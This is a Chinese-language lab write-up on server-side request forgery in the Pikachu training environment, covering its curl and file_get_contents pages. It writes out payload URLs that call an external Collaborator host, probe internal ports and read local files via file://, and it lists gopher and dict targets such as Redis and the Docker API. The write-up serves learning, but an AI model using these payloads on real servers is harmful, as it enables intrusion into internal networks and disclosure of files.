
学习SSRFSSRF服务端请求伪造服务器提供了从远程拉取资源的功能比如图片预览、URL转码、爬虫、获取网页摘要等但又没有对目标地址做严格过滤与限制攻击者传入恶意URL让服务器去访问这个地址很多内网服务默认信任本机访问服务器作为请求发起者可以访问服务器所在内网总结骗服务器干活拿服务器当跳板扫内网。SSRFcurl只有一个可以点击的链接没有任何输入框或选择看一下提示提示要我了解一下curl相关函数用法。·PHP中curl是用来在服务端发起HTTP请求的扩展·curl支持多种协议包括http/https、gopher、dict、file、ftpgopher协议在其中威胁最大能发送任意TCP数据俗称“万能协议”。学习地址https://zhuanlan.zhihu.com/p/2046951452132881344?utm_mediumopenapi_platformutm_sourcee10c3ad29e50接下来开始读诗http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info1.php判断SSRF存在用burp的Collaborator模块获取一个域名kk8wap9xz661r8u37fhaicecu30uomcb.oastify.com尝试让这个ssrf网站访问域名http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlkk8wap9xz661r8u37fhaicecu30uomcb.oastify.com访问成功按Poll now按键后获取到访问请求。证明这里存在SSRF漏洞访问回环地址网页http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1端口探测http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://127.0.0.1:3306显示了我的MySQL的版本信息和乱码。内网端口探测成功。读取文件试试file协议http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_curl.php?urlfile:///C:/Windows/win.ini显示了我的win.ini文件内容。读取服务器本地文件。SSRFfile_get_content提示要我了解一下file_get_content()相关函数用法。·file_get_content要代码中写了“allow_url_fopen On”才能访问网络URL·file_get_content支持的协议比较少了包括http/https、file、ftp依旧是叫我读诗注意到此时URL结构http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info2.php可以在file...这里做文章访问回环地址网页http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1端口探测http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1:3306探测失败了解后才明白因为3306端口MySQL不认识HTTP请求所以页面会空白http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filehttp://127.0.0.1:8080探测8080端口时就回显了我的8080端口刚好是BurpSuite在占用读取文件由于file_get_contents支持file://协议尝试读取文件http://10.34.216.210/pikachu-master/vul/ssrf/ssrf_fgc.php?filefile:///C:/Windows/win.inigopher:// 协议打内网对比·http只能发 HTTP 请求·gopher他的本质是隧道能发送任意 TCP 报文所以Redis、FastCGI快速通用网关接口默认配置在9000端口、Mysql3306、Memcached缓存系统11211端口、Zabbix Agent监控平台10050端口、Docker APIDocker Daemon监听在2375端口都可以打dict://dict协议只能发文本命令并且会自动补充\r\n可以打redis、简单TCP服务探测内网